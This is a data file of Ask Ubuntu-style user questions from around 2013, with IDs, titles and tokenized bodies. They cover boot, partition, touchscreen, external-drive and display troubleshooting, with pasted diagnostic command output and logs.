302963	i ca n't boot into syslinux menu	i tried to create a liveusb with unetbootin but when i boot with this usb , there was only a cursor blinking with black screen ( not purple one ) , no option for me to install ubuntu , please help ! i set the boot option to usb first priority . my system specs is : cpu : e3120 main asus p5kpl-vm vga : ati hd4670 ram : 4gb blinking cursor http : //i128.photobucket.com/albums/p170/longmaba/img_0903_zpsb7c634e1.jpg
302968	samsung ativ smart pc pro touch screen not recognized , only stylus is	i am having an issue with ubuntu 13.04 on my samsung ativ smart pc pro . basically , the touchscreen does n't seem to be recognized , everything is acting like the stylus instead . this causes really annoying behavior ( basically i ca n't scroll by using the touchscreen , i can only click and no multitouch gestures work either . here 's some info about my system : brent @ rptablet : ~ $ xsetwacom list devices wacom isdv4 ec pen stylus id : 9 type : stylus wacom isdv4 ec pen eraser id : 16 type : eraser brent @ rptablet : ~ $ xinput ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ wacom isdv4 ec pen stylus id=9 [ slave pointer ( 2 ) ] ⎜ ↳ atmel atmel maxtouch digitizer id=10 [ slave pointer ( 2 ) ] ⎜ ↳ usb keyboard+smartpad id=13 [ slave pointer ( 2 ) ] ⎜ ↳ wacom isdv4 ec pen eraser id=16 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ webcam sc-50afl11c54n id=11 [ slave keyboard ( 3 ) ] ↳ usb keyboard+smartpad id=12 [ slave keyboard ( 3 ) ] ↳ webcam sc-20hdm12347n id=14 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=15 [ slave keyboard ( 3 ) ] brent @ rptablet : ~ $ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 0483:91d1 sgs thomson microelectronics bus 003 device 003 : id 0424:2514 standard microsystems corp. usb 2.0 hub bus 003 device 004 : id 03eb:8411 atmel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 8087:07da intel corp . bus 001 device 004 : id 2232:1034 bus 001 device 005 : id 0424:2514 standard microsystems corp. usb 2.0 hub bus 001 device 006 : id 2232:1036 bus 002 device 003 : id 10c4 : ea60 cygnal integrated products , inc. cp210x uart bridge / myavr mysmartusb light bus 003 device 005 : id 10c4 : ea60 cygnal integrated products , inc. cp210x uart bridge / myavr mysmartusb light bus 003 device 006 : id 056a:00ec wacom co. , ltd bus 001 device 007 : id 04f3:0740 elan microelectronics corp. brent @ rptablet : ~ $ lsmod module size used by parport_pc 28152 0 ppdev 17073 0 rfcomm 42641 12 bnep 18036 2 nls_iso8859_1 12713 1 snd_hda_codec_hdmi 36913 1 snd_hda_codec_realtek 78399 1 cp210x 17382 0 wacom 57412 0 usbserial 36911 1 cp210x uvcvideo 80847 0 videobuf2_vmalloc 13056 1 uvcvideo videobuf2_memops 13202 1 videobuf2_vmalloc videobuf2_core 40513 1 uvcvideo videodev 129260 2 uvcvideo , videobuf2_core coretemp 13355 0 kvm_intel 132891 0 kvm 443165 1 kvm_intel ghash_clmulni_intel 13259 0 joydev 17377 0 aesni_intel 55399 1 aes_x86_64 17255 1 aesni_intel xts 12885 1 aesni_intel lrw 13257 1 aesni_intel gf128mul 14951 2 lrw , xts ablk_helper 13597 1 aesni_intel cryptd 20373 3 ghash_clmulni_intel , aesni_intel , ablk_helper hid_generic 12540 0 hid_sensor_hub 18484 0 btusb 22474 0 hid_multitouch 17366 0 bluetooth 228619 22 bnep , btusb , rfcomm tpm_infineon 17410 0 usbhid 47074 2 hid_multitouch , hid_sensor_hub hid 101002 4 hid_multitouch , hid_generic , hid_sensor_hub , usbhid microcode 22881 0 arc4 12615 2 iwldvm 241834 0 mac80211 606457 1 iwldvm snd_hda_intel 39619 3 snd_hda_codec 136453 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec snd_pcm 97451 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi wmi 19070 0 tpm_tis 18675 0 snd_rawmidi 30180 1 snd_seq_midi snd_seq 61554 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi iwlwifi 173477 1 iwldvm i915 600351 4 serio_raw 13215 0 mac_hid 13205 0 video 19390 1 i915 snd_timer 29425 2 snd_pcm , snd_seq cfg80211 510937 3 iwlwifi , mac80211 , iwldvm drm_kms_helper 49394 1 i915 drm 286313 5 i915 , drm_kms_helper lpc_ich 17061 0 mei 41158 0 snd 68876 16 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device soundcore 12680 1 snd i2c_algo_bit 13413 1 i915 lp 17759 0 parport 46345 3 lp , ppdev , parport_pc ahci 25731 3 libahci 31364 1 ahci
302969	how to show all the windows partitions on ubuntu 12.04	i have installed ubuntu 12.04 with wubi.exe installer . it was installed successfully . but it is now showing two of my windows drives , but not showing other two . i have four in total . how can i fix this ? output of sudo fdisk -l : device boot start end blocks id system /dev/sda1 63 2047 992+ 42 sfs /dev/sda2 * 2048 206847 102400 42 sfs /dev/sda3 206848 204802047 102297600 42 sfs /dev/sda4 204802048 976771119 385984536 42 sfs
302987	since june 1st , i can not update ubuntu 11.04 or install anything for the software center	i would like to ask if the software center files regarding natty narwhal has been taken offline permanently since june this year ? practically this means , i can not install new software from the software center . now i am pretty happy with my system the way it is , and could live for a time without installing new stuff , but is n't it kind of radical to pull the plug on the software center software for natty narwhal , just because it is n't supported with updates from canonical anymore ? is there a mirrorsite somewhere that still has the software center files in that case ? kind regards ,
302996	making ubuntu my default os	i recently installed ubuntu , which instead of eliminating windows , it partitioned it . my question is first how to make ubuntu my default os ? secondly , how do i remove windows to speed up the computer ? this is not the grub i am talking about , rather the partitions you have to chose between before you enter the grub . right now if i am not right at the computer when the partitions windows xp and ubuntu pops up , it will automatically go to windows . i want it to automatically choose ubuntu instead . the grub is here it goes to once i enter the ubuntu partition . the settings there is fine . i need it to open upuntu automatically.how do i do that . sorry , i ca n't explain it better then that , im not as knowlegable as y'all .
302997	ext4 partition works but fdisk shows no valid partition table	i have a 1tb disk with a single ext4 partition . here 's some output of parted print all command model : ata hitachi hds72101 ( scsi ) disk /dev/sdb : 1000gb sector size ( logical/physical ) : 512b/4096b partition table : loop number start end size file system flags 1 0.00b 1000gb 1000gb ext4 however fdisk reports that there is no valid partition disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/sdb does n't contain a valid partition table testdisk /dev/sdb reports disk /dev/sdb - 1000 gb / 931 gib - chs 121601 255 63 current partition structure : partition start end size in sectors partition sector does n't have the endmark 0xaa55 then testdisk deepscan finds linux 0 0 1 121601 80 63 1953525168 [ storage ] when i try to add this partition in testdisk it does n't do anything and just exits to screen showing no partitions . dumpe2fs -h /dev/sdb returns the following information dumpe2fs 1.42.5 ( 29-jul-2012 ) filesystem volume name : storage last mounted on : /mnt/storage filesystem uuid : 5889e47c-b13b-4157-9161-0e7a31095b12 filesystem magic number : 0xef53 filesystem revision # : 1 ( dynamic ) filesystem features : has_journal ext_attr resize_inode dir_index filetype extent flex_bg sparse_super large_file huge_file uninit_bg dir_nlink extra_isize filesystem flags : signed_directory_hash default mount options : user_xattr acl filesystem state : clean errors behavior : continue filesystem os type : linux inode count : 61054976 block count : 244190646 reserved block count : 12209532 free blocks : 139902528 free inodes : 60775208 first block : 0 block size : 4096 fragment size : 4096 reserved gdt blocks : 965 blocks per group : 32768 fragments per group : 32768 inodes per group : 8192 inode blocks per group : 512 flex block group size : 16 filesystem created : sat sep 15 14:29:58 2012 last mount time : sat jun 1 19:53:40 2013 last write time : sat jun 1 22:29:09 2013 mount count : 0 maximum mount count : -1 last checked : sat jun 1 22:29:09 2013 check interval : 0 ( < none > ) lifetime writes : 79 gb reserved blocks uid : 0 ( user root ) reserved blocks gid : 0 ( group root ) first inode : 11 inode size : 256 required extra isize : 28 desired extra isize : 28 journal inode : 8 default directory hash : half_md4 directory hash seed : 1d72f9a3-8c59-4b86-9e02-b9ab512ce90c journal backup : inode blocks journal features : journal_incompat_revoke journal size : 128m journal length : 32768 journal sequence : 0x00009489 journal start : 0 this is my secondary data drive that i use daily . i have data on it that i 'd rather not nuke . i 'm not sure if i should be concerned about this or if i should not worry about it . the disk works but i do n't know if it 's a failure waiting to happen . question : where to go from here if i want to make sure the disk is setup optimally ?
303001	installed 13.04 alongside windows 7 , now i cant boot into windows	i believe what i did was i installed ubuntu to the same partition as windows 7 , i thought that was what i was suppose to do but now i cant boot into windows . when i try it tells me `` boot manager missing '' and then the screen turns into a collage of colors . i even tried to re-install windows 7 but after the `` windows is loading files '' progress bar , it turns into a collage of colors again and nothing happens . the only thing i can do is restart my pc and boot up ubuntu . i 'm thinking the only way to fix this is by formatting my hdd and re-installing windows 7 but i would prefer to not lose all my files . any help appreciated , thanks in advance
303004	trouble installing ubuntu on a virtual machine	i 'm trying to install ubuntu 12.04 through virtualbox . i get through the install process , but after i hit `` restart now '' when it restarts it says `` ubuntu is running in low graphics mode . your screen , graphics card , and input devices could not be detected correctly . you will need to configure them yourself . '' the only valid option afterwards is to run in low-graphics mode for a session . it then takes me to a command prompt-esque console , which is hardly what i wanted . what do i need to do to fix this ?
303013	how can i add programs to a startup disk	hello i am looking for a way to add additional code to a startup disk ( beyond the basic iso . ) specifically looking to add a mud client as i am using a startup disk because my harddive has died yes i am still mudding in 2013.. or more specifically still looking to play some sort of online game after playing lotro for years before my hard drive crash
303018	external hard drive wo n't mount but is detected	yesterday i bought an external drive and after reformatting it to ext4 , ubuntu could no longer `` see '' it . i asked for help , and eventually came to the conclusion that the drive was somewhat defective . so i returned it , and got a new one . before reformatting it , i plugged it and discovered that ubuntu ( 12.04 ) could n't see it . i thought maybe i 'd goofed up something in the os , so i used my 32gb thumbdrive to back up my docs & needed files , and then installed ubuntu ( 13.04 ) from scratch . when i plugged in my external drive , the new os still ca n't see it there . i ran some checks , and saw the output of dmesg actually does show it was detected , but otherwise there was no sign of it in any other way . how do i fix this ? is there a way to mount it even if i ca n't `` see '' it there ? here 's the output messages from a few things i checked this evening after i installed 13.04 & plugged in my external drive ... . $ sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x000539fb device boot start end blocks id system /dev/sda1 * 2048 969058303 484528128 83 linux /dev/sda2 969060350 976771071 3855361 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 969060352 976771071 3855360 82 linux swap / solaris $ lsusb bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 04f2 : b209 chicony electronics co. , ltd -- -- after plugging in my 32gb thumbdrive -- -- $ dmesg | tail -n 17 [ 979.174904 ] usb 2-1.1 : new high-speed usb device number 7 using ehci-pci [ 979.267866 ] usb 2-1.1 : new usb device found , idvendor=0781 , idproduct=5530 [ 979.267874 ] usb 2-1.1 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 979.267879 ] usb 2-1.1 : product : cruzer glide [ 979.267884 ] usb 2-1.1 : manufacturer : sandisk [ 979.267889 ] usb 2-1.1 : serialnumber : 200549636207be00f894 [ 979.268934 ] scsi6 : usb-storage 2-1.1:1.0 [ 980.267711 ] scsi 6:0:0:0 : direct-access sandisk cruzer glide 1.26 pq : 0 ansi : 5 [ 980.268959 ] sd 6:0:0:0 : attached scsi generic sg2 type 0 [ 980.270467 ] sd 6:0:0:0 : [ sdb ] 62530624 512-byte logical blocks : ( 32.0 gb/29.8 gib ) [ 980.274744 ] sd 6:0:0:0 : [ sdb ] write protect is off [ 980.274753 ] sd 6:0:0:0 : [ sdb ] mode sense : 43 00 00 00 [ 980.275724 ] sd 6:0:0:0 : [ sdb ] write cache : disabled , read cache : enabled , does n't support dpo or fua [ 980.285663 ] sdb : sdb1 [ 980.289108 ] sd 6:0:0:0 : [ sdb ] attached scsi removable disk [ 980.762302 ] systemd-hostnamed [ 3676 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname ! [ 1083.401263 ] sdb : detected capacity change from 32015679488 to 0 [ 1246.785895 ] usb 2-1.1 : usb disconnect , device number 7 -- -- after plugging in my 2tb toshiba canvio external hard drive & then unplugged it -- -- $ dmesg | tail -n 8 [ 1728.251102 ] usb 2-1.3 : new high-speed usb device number 8 using ehci-pci [ 1728.345301 ] usb 2-1.3 : new usb device found , idvendor=0480 , idproduct=d010 [ 1728.345309 ] usb 2-1.3 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 1728.345314 ] usb 2-1.3 : product : external usb 3.0 [ 1728.345319 ] usb 2-1.3 : manufacturer : toshiba [ 1728.345324 ] usb 2-1.3 : serialnumber : 20130114021358 [ 1728.346698 ] scsi7 : usb-storage 2-1.3:1.0 [ 1729.423255 ] usb 2-1.3 : usb disconnect , device number 8 ... as you can see , it 's detected it , but i do n't know how to access it or mount it . i can see that the 32gb thumbdrive was mounted automatically to sdb , but the external drive was simply detected and that 's all . they were both plugged into the same usb port .
303019	booting from usb	i created a bootable usb and booted from the usb drive , but i do n't get the ubunutu screen when the computer starts . i get my usual windows desktop . i do n't get the welcome screen with the options like the instructions say is supposed to happen . what do i do ?
303020	ubuntu gnome desktop messed with second display	this used to work some time ago . i could connect a second screen on the display port interface of my laptop ( via display port - > dvi adapter ) , then use the catalyst control center and select `` single display desktop ( multi-desktop ) '' to have an extended desktop where i can work with my laptop screen and the seperate screen side by side . initially when i connect the display i get cloned desktop mode . now when i go to catalyst and select said option , i get the usual `` do you want to keep these settings '' message for 15s . at this point i can already see that nothing changed ( which used to be different ) . i get a message asking me to restart the machine in order to make the changes work . this was n't necessary before . after a restart when the gnome desktop has loaded , i have one display with white background and two empty gnome-panels , one on top and one on the bottom - nothing else ( there is the usual desktop context menu on right click though ) the other display has the usual look and panels , except every item on the panel is duplicated , i.e . two application/places menues two clocks two system menus two taskbars , two workspace switchers etc . i can move the mouse cursor across the screens seamlessly , i can not drag windows from one screen to the other . also interestingly the window switcher normally displays a 2-by-2 workspace layout . now suddenly i have 1-by-4 ( single row ) . the workspace switcher used to visualise the additional screen real-estate in short the desktop is totally messed up . i ca n't begin to express how annoying this is . ubuntu version is 12.04 , i do not use the unity ui , but the classic gnome one .
303021	ca n't run second life firestorm viewer ( 32bit ) in ubuntu 64 bit	i 'm trying to install a second life client called phoenix viewer . on the first attempt , i got a message about x errors . i searched the net all i could see to fix 32 bit apps and run them under 64 bit ubuntu was shared libraries issues , so i installed all libraries that i found suggested in all articles but the error persists . can someone help or at least give me a hint on what to do ? this is my output ( too long i know , but i thought i should include all info ) : deus @ work : ~/programs/phoenix_firestorm-release_i686_4.4.0.33720 $ ./firestorm 64-bit linux detected . multi-arch support detected . running from /home/deus/programs/phoenix_firestorm-release_i686_4.4.0.33720 ./firestorm : line 98 : ./etc/register_hopprotocol.sh : no such file or directory 2013-06-02t00:01:51z info : llcommon/llerror.cpp ( 334 ) : ( anonymous namespace ) : :logcontrolfile : :loadfile : logging reconfigured from /home/deus/programs/phoenix_firestorm-release_i686_4.4.0.33720/app_settings//logcontrol.xml 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2477 ) : loadsettingsfromdirectory : attempting to load settings for the group global - from location default 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2512 ) : loadsettingsfromdirectory : loaded settings file /home/deus/programs/phoenix_firestorm-release_i686_4.4.0.33720/app_settings/settings.xml 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2477 ) : loadsettingsfromdirectory : attempting to load settings for the group peraccount - from location default 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2512 ) : loadsettingsfromdirectory : loaded settings file /home/deus/programs/phoenix_firestorm-release_i686_4.4.0.33720/app_settings/settings_per_account.xml 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2477 ) : loadsettingsfromdirectory : attempting to load settings for the group crashsettings - from location default 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2512 ) : loadsettingsfromdirectory : loaded settings file /home/deus/programs/phoenix_firestorm-release_i686_4.4.0.33720/app_settings/settings_crash_behavior.xml 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2477 ) : loadsettingsfromdirectory : attempting to load settings for the group warnings - from location default 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2512 ) : loadsettingsfromdirectory : loaded settings file /home/deus/programs/phoenix_firestorm-release_i686_4.4.0.33720/app_settings/ignorable_dialogs.xml 2013-06-02t00:01:51z info : newview/llappviewerlinux.cpp ( 478 ) : initparsecommandline : language en 2013-06-02t00:01:51z info : newview/llappviewerlinux.cpp ( 479 ) : initparsecommandline : location us 2013-06-02t00:01:51z info : newview/llappviewerlinux.cpp ( 480 ) : initparsecommandline : variant utf-8 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2693 ) : initconfiguration : using command line specified settings filename : /home/deus/.firestorm/user_settings/settings_firestorm-release_v4.xml 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2477 ) : loadsettingsfromdirectory : attempting to load settings for the group global - from location user 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2512 ) : loadsettingsfromdirectory : loaded settings file /home/deus/.firestorm/user_settings/settings_firestorm-release_v4.xml 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2477 ) : loadsettingsfromdirectory : attempting to load settings for the group crashsettings - from location user 2013-06-02t00:01:51z warning : llxml/llcontrol.cpp ( 939 ) : llcontrolgroup : :loadfromfile : can not find file /home/deus/.firestorm/user_settings//home/deus/.firestorm/user_settings/settings_crash_behavior.xml to load . 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2526 ) : loadsettingsfromdirectory : can not load /home/deus/.firestorm/user_settings//home/deus/.firestorm/user_settings/settings_crash_behavior.xml - no settings found . 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2477 ) : loadsettingsfromdirectory : attempting to load settings for the group warnings - from location user 2013-06-02t00:01:51z warning : llxml/llcontrol.cpp ( 939 ) : llcontrolgroup : :loadfromfile : can not find file /home/deus/.firestorm/user_settings/ignorable_dialogs.xml to load . 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2526 ) : loadsettingsfromdirectory : can not load /home/deus/.firestorm/user_settings/ignorable_dialogs.xml - no settings found . 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2477 ) : loadsettingsfromdirectory : attempting to load settings for the group global - from location session 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2512 ) : loadsettingsfromdirectory : loaded settings file /home/deus/programs/phoenix_firestorm-release_i686_4.4.0.33720/app_settings/settings_firestorm.xml 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2477 ) : loadsettingsfromdirectory : attempting to load settings for the group peraccount - from location usersession 2013-06-02t00:01:51z warning : llxml/llcontrol.cpp ( 939 ) : llcontrolgroup : :loadfromfile : can not find file /home/deus/programs/phoenix_firestorm-release_i686_4.4.0.33720/app_settings/account_settings_firestorm.xml to load . 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2526 ) : loadsettingsfromdirectory : can not load /home/deus/programs/phoenix_firestorm-release_i686_4.4.0.33720/app_settings/account_settings_firestorm.xml - no settings found . 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2477 ) : loadsettingsfromdirectory : attempting to load settings for the group global - from location user 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2512 ) : loadsettingsfromdirectory : loaded settings file /home/deus/.firestorm/user_settings/settings_firestorm-release_v4.xml 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2477 ) : loadsettingsfromdirectory : attempting to load settings for the group crashsettings - from location user 2013-06-02t00:01:51z warning : llxml/llcontrol.cpp ( 939 ) : llcontrolgroup : :loadfromfile : can not find file /home/deus/.firestorm/user_settings//home/deus/.firestorm/user_settings/settings_crash_behavior.xml to load . 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2526 ) : loadsettingsfromdirectory : can not load /home/deus/.firestorm/user_settings//home/deus/.firestorm/user_settings/settings_crash_behavior.xml - no settings found . 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2477 ) : loadsettingsfromdirectory : attempting to load settings for the group warnings - from location user 2013-06-02t00:01:51z warning : llxml/llcontrol.cpp ( 939 ) : llcontrolgroup : :loadfromfile : can not find file /home/deus/.firestorm/user_settings/ignorable_dialogs.xml to load . 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 2526 ) : loadsettingsfromdirectory : can not load /home/deus/.firestorm/user_settings/ignorable_dialogs.xml - no settings found . 2013-06-02t00:01:51z info : newview/llviewernetwork.cpp ( 211 ) : initialize : using last grid : util.agni.lindenlab.com 2013-06-02t00:01:51z info : newview/llviewernetwork.cpp ( 397 ) : setgridchoice : setting util.agni.lindenlab.com 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 3909 ) : initmarkerfile : exec marker found : program froze on previous execution 2013-06-02t00:01:51z info : newview/llappviewer.cpp ( 3400 ) : checkforcrash : last execution froze , sending a crash report . 2013-06-02t00:01:51z info : llcommon/llapp.cpp ( 664 ) : fork : forked child process 6325 2013-06-02t00:01:51z info : llcommon/llerror.cpp ( 334 ) : ( anonymous namespace ) : :logcontrolfile : :loadfile : logging reconfigured from /home/deus/programs/phoenix_firestorm-release_i686_4.4.0.33720/app_settings//logcontrol.xml 2013-06-02t00:01:51z info : llcrashlogger/llcrashlogger.cpp ( 583 ) : init : loading crash behavior setting 2013-06-02t00:01:51z warning : llxml/llcontrol.cpp ( 939 ) : llcontrolgroup : :loadfromfile : can not find file /home/deus/.firestorm/user_settings/settings_crash_behavior.xml to load . 2013-06-02t00:01:52z info : linux_crash_logger/linux_crash_logger.cpp ( 45 ) : main : crash reporter finished normally . 2013-06-02t00:01:52z info : llcommon/llapr.cpp ( 73 ) : ll_cleanup_apr : cleaning up apr 2013-06-02t00:01:52z warning : llui/lluicolortable.cpp ( 388 ) : lluicolortable : :loadfromfilename : unable to parse color file /home/deus/.firestorm/user_settings/colors.xml 2013-06-02t00:01:52z info : newview/llappviewer.cpp ( 850 ) : init : configuration initialized . 2013-06-02t00:01:52z info : newview/llappviewer.cpp ( 885 ) : init : llcurl initialized . 2013-06-02t00:01:52z info : newview/llappviewer.cpp ( 905 ) : init : threads initialized . 2013-06-02t00:01:52z info : newview/llappviewer.cpp ( 919 ) : init : ui initialized . 2013-06-02t00:01:52z info : llui/llnotifications.cpp ( 1439 ) : llnotifications : :loadtemplates : reading notifications template 2013-06-02t00:01:52z info : llui/llnotifications.cpp ( 1510 ) : llnotifications : :loadtemplates : ... done 2013-06-02t00:01:52z info : newview/llappviewer.cpp ( 934 ) : init : notifications initialized . 2013-06-02t00:01:52z info : newview/llappviewer.cpp ( 3643 ) : writesysteminfo : firestorm version 4.4.0 2013-06-02t00:01:52z info : newview/llappviewer.cpp ( 3651 ) : writesysteminfo : local time : 2013-06-02t03:01:52 eest 2013-06-02t00:01:52z info : newview/llappviewer.cpp ( 3654 ) : writesysteminfo : cpu info : processor : 0 vendor_id : genuineintel cpu family : 6 model : 58 model name : intel ( r ) core ( tm ) i7-3537u cpu @ 2.00ghz stepping : 9 microcode : 0x15 cpu mhz : 2000.000 cache size : 4096 kb physical id : 0 siblings : 4 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 onitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm ida arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid fsgsbase smep erms bogomips : 4988.70 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : processor : 1 vendor_id : genuineintel cpu family : 6 model : 58 model name : intel ( r ) core ( tm ) i7-3537u cpu @ 2.00ghz stepping : 9 microcode : 0x15 cpu mhz : 775.000 cache size : 4096 kb physical id : 0 siblings : 4 core id : 0 cpu cores : 2 apicid : 1 initial apicid : 1 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 onitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm ida arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid fsgsbase smep erms bogomips : 4988.70 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : processor : 2 vendor_id : genuineintel cpu family : 6 model : 58 model name : intel ( r ) core ( tm ) i7-3537u cpu @ 2.00ghz stepping : 9 microcode : 0x15 cpu mhz : 2000.000 cache size : 4096 kb physical id : 0 siblings : 4 core id : 1 cpu cores : 2 apicid : 2 initial apicid : 2 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 onitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm ida arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid fsgsbase smep erms bogomips : 4988.70 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : processor : 3 vendor_id : genuineintel cpu family : 6 model : 58 model name : intel ( r ) core ( tm ) i7-3537u cpu @ 2.00ghz stepping : 9 microcode : 0x15 cpu mhz : 2000.000 cache size : 4096 kb physical id : 0 siblings : 4 core id : 1 cpu cores : 2 apicid : 3 initial apicid : 3 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 onitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm ida arat epb xsaveopt pln pts dtherm tpr_shadow vnmi flexpriority ept vpid fsgsbase smep erms bogomips : 4988.70 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : - > mhassse : 1 - > mhassse2 : 1 - > mhasaltivec : 0 - > mcpumhz : 775 - > mcpustring : intel ( r ) core ( tm ) i7-3537u cpu @ 2.00ghz ( 775 mhz ) 2013-06-02t00:01:52z info : newview/llappviewer.cpp ( 3655 ) : writesysteminfo : memory info : 2013-06-02t00:01:52z < mem > active : 1236688 2013-06-02t00:01:52z < mem > active ( anon ) : 851732 2013-06-02t00:01:52z < mem > active ( file ) : 384956 2013-06-02t00:01:52z < mem > anonhugepages : 0 2013-06-02t00:01:52z < mem > anonpages : 850604 2013-06-02t00:01:52z < mem > bounce : 0 2013-06-02t00:01:52z < mem > buffers : 56300 2013-06-02t00:01:52z < mem > cached : 1377984 2013-06-02t00:01:52z < mem > commitlimit : 5974820 2013-06-02t00:01:52z < mem > committed_as : 3455840 2013-06-02t00:01:52z < mem > directmap2m : 8218624 2013-06-02t00:01:52z < mem > directmap4k : 77824 2013-06-02t00:01:52z < mem > dirty : 120 2013-06-02t00:01:52z < mem > hardwarecorrupted : 0 2013-06-02t00:01:52z < mem > hugepages_free : 0 2013-06-02t00:01:52z < mem > hugepages_rsvd : 0 2013-06-02t00:01:52z < mem > hugepages_surp : 0 2013-06-02t00:01:52z < mem > hugepages_total : 0 